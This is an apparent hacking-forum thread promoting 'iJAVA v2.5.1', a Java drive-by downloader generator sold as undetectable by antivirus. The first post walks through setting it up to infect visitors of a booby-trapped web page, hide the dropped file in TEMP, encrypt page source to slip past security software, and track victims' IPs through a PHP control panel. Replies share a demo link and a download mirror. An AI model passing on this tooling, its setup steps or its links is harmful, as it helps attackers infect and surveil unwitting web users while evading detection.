Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


iJAVA v2.5.1 | Java Drive-By Generator FULLY UNDETECTABLE 0/33 ~ Always filter_list
Author
Message
iJAVA v2.5.1 | Java Drive-By Generator FULLY UNDETECTABLE 0/33 ~ Always #1
[Image: 21948207.png]
iJAVA v2.5.1 | Java Drive-By Generator
GENERATE FULLY UNDETECTABLE JAVADRIVEBY EVERY TIME

[Image: 39783435.png]

----------------------------------------------------------------------------------------------------------------
Credits Goes to ----------->Ababneh1
for all his Hard WOrk

----------------------------------------------------------------------------------------------------------------

The program produces Java drive-by Downloader encrypted in different each time
You can run your server on the victim machine by mining the web page, and as I said earlier
The method is not considered a gap and this is the best because they are thus more stable and effective and do not need
However, the existence of JavaScript in the normal organs of most users, the most prominent of these new features:

The most important characteristic of the program accuracy, speed and lack of mistakes, God willing, in addition to the interface pretty easy
Its Use does not require any other applications or OCX files

1. Works on all types of browsers supporting Java
2. Needs only the presence of Java on a victim and now this is considered normal and widespread
3. The possibility of modification on the page mined and the inclusion of the components of the real to convince the victim
4. Do not rely on the gaps and therefore more stability and ensure the effectiveness of
5. Use two new Downloader for one of them depends on the values ​​taken from the Website
Itself and the other from the same driveby.
6. Dispense with the old way, which depends on the vbs script because it was exposed and found to be
Work on some devices.
7. The possibility of choosing a web page to inject code by running driveby.
8. The possibility of selection of name server after downloading it in place of a victim and also coming off.
9. The possibility of linking page ijava control online Admin Control Panel tells you the title
The victim (his own) and the Internet address (IP Address) and tells you whether it was accepted by the page
The victim and run ijava or not.
10. The possibility of work converting bomb of the page to any page in the other two cases: the first in the case of
Acceptance and operation of the server and the second in case of non-acceptance and rejection (Cancel).
11. The possibility of encrypting Source Website mined to ensure that the exposure time of examination RunTime
[Image: 7564508731ce34ab1cd56fc.png]
[Image: 45527591.png]
[Image: 7564508731ce34ab1cd56fc.png]
[Image: 28828978.png]
You can choose from are two ways for a downloader of course both encrypted and efficiently
And the stability of the following brief explanation of each of them ..

The first way: HTML Based Java Drive-By
The Aldaonlodr take some values, such as your server address and other selected characteristics of the page
Mined the same way and this belief more difficult for security companies and therefore will last unearthing more
God willing

The second way: JAR Based Java Drive-By
The program is to take your values ​​and put himself without relying on the page mined

As you can see more of you can modify other options by clicking the Other Options button to show the window:
[Image: 67251440.png]
[Image: 7564508731ce34ab1cd56fc.png]
As you can see it consists of two parts

Section I: Custom Publisher
You can document the Java digital certificate you choose the name and address .. Etc. I would recommend not
Change it because it does not affect the program but have important differences in ijava every time ..

Section II: Project Name Project Name
This is important because it shows the name of the victim when entering the page
[Image: 44517889.png]
From here you can choose the page you want or mined by the injection code (currently permitted extension of HTML)
As you can see, the program will display in an upcoming issue on the burner of the sites ************ site Cloner so
You can copy the interface of any site you want and the code injection, but is currently disabled

Click on the + button and select the page you want to place mined
[Image: 89988465.png]
From here you can choose the name of the server after downloading it in a place the victim in addition to coming in
A victim and always preferred the temporary files TEMP
[Image: 95785744.png]
Here must be the first box and put a link directly to your server and in the second box is placed the title to Control Panel
If you are interested in this property into account the situation with the way the address shown inside the box and you're not explain
In the last topic
[Image: 40310844.png]
Here you can choose to encrypt the source web page mined using Javascript
Therefore very useful to pass some security programs at run time, especially those containing
Protect the Internet ************ Protection program provides you four different levels of encryption ..
[Image: 20102415.png]
This property is one of the most important characteristics of the program and called for a lot of members of the Publications
The previous program where the page enables you to convert mined to an Internet address in the cases of another
Acceptance server downloader (pressure on the RUN) In the case of rejection (pressure on the Cancel) for example ..

If the pressure on the victim before the operation and is run by the server and then convert it to another site such as Google
But if it did not accept the refusal pressure is converted to other Web sites such as Facebook.

This allows you to get many interpretations to try to persuade the victim run the server
[Image: 7564508731ce34ab1cd56fc.png]
My friends the most important thing is that we know Has the victim run the downloader, or how we know the ratio
The total number of victims who have accepted the page and run the server to the number of those who rejected it did not
Accept it and this is the role of this property is excellent as the fact that it tells you so in return for the lifting of the
Files to the control panel on any host accepts the PHP and linked to a database ..

Here are pictures of the list control
[Image: 67125059.png]
As you can see is the protection of your user control panel username and password
[Image: 14653500.png]
Here the main interface of the Control Panel
[Image: 52698046.png]
In the same folder as the program you will find a folder named Admin Panel Log in to him and then went to the file
Named index.php and open it using a text editor such as Notepad and change the necessary
As follows ..
[Image: 64416755.png]
Where xx values ​​rather than put the information for the database that you created
[Image: 7564508731ce34ab1cd56fc.png]
SCAN::
Spoiler:
http://myavscan.net/result.php?scan=MjUwNjUy
Download ::
Spoiler:
[Image: 71206748.png]
Or From Here
Or Here

Reply

RE: iJAVA v2.5.1 | Java Drive-By Generator #2
Wow.. I'm going to check this out, thank you.

Reply

RE: iJAVA v2.5.1 | Java Drive-By Generator #3
The Pleasure is all mine!
it definitely work dude
Here is the demo ----->
Code:
goo.gl/jwf4W

for checking purposes! i just made
like 10 minutes ago! hehe

Reply

RE: iJAVA v2.5.1 | Java Drive-By Generator #4
can u reupload it on mediafire?
[Image: 8c8a744d.png]

Reply

RE: iJAVA v2.5.1 | Java Drive-By Generator #5
(03-06-2012, 03:58 PM)TECHNOHOLIX Wrote: can u reupload it on mediafire?

Code:
http://www.mediafire.com/?923devai740wdpd
the mediafire Link is still working TECHNOHOLIX!!
Confusedmoke:

Reply

RE: iJAVA v2.5.1 | Java Drive-By Generator #6
thank you very much for the mirror Biggrin
[Image: 8c8a744d.png]

Reply







Users browsing this thread: 1 Guest(s)